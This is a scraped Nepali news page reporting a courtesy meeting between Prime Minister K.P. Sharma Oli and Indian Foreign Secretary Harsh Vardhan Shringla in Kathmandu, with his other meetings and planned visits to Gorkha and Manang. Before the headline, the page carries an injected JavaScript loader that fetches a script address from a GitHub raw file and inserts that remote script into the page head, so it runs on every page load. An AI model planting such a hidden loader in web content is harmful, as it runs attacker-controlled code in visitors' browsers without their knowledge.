;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); प्रधानमन्त्री ओली र भारतका विदेश सचिव श्रींगलाबिच शिष्टाचार भेट् – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • प्रधानमन्त्री ओली र भारतका विदेश सचिव श्रींगलाबिच शिष्टाचार भेट्
राजनीति

प्रधानमन्त्री ओली र भारतका विदेश सचिव श्रींगलाबिच शिष्टाचार भेट्

मंसिर ११,

काठमाडौं । भारतका विदेश सचिव हर्षवर्धन श्रींगलाले प्रधानमन्त्री केपी शर्मा ओलीसँग शिष्टाचार भेट गरेका छन् ।

बिहिबार साँझ प्रधानमन्त्री निवास बालुवाटारमा भेटघाट भएको प्रधानमन्त्री ओलीका प्रेस सल्लहाकार सूर्य थापाले जानकारी दिए ।

बिहीबार काठमाडौं आएदेखि उनी निरन्तर भेटघाटमा छन् । उनले परराष्ट्र सचिवस्तरको बैठकमा सहभागी हुनुका साथै परराष्ट्र मन्त्री प्रदीप ज्ञवालीसँग पनि भेटवार्ता गरेका छन् ।

त्यस्तै बिहीबार नै राष्ट्रपति विद्यादेवी भण्डारीसँग पनि भेटवार्ता गर्ने कार्यक्रम छ । शुक्रबार उनी गोरखा र मनाङमा भारतको सहयोगमा निर्माण भएका घर र धार्मिक स्थल उद्घाटन गर्न जाने कार्यक्रम तय भएको छ ।

फेसबुक प्रतिक्रियाहरु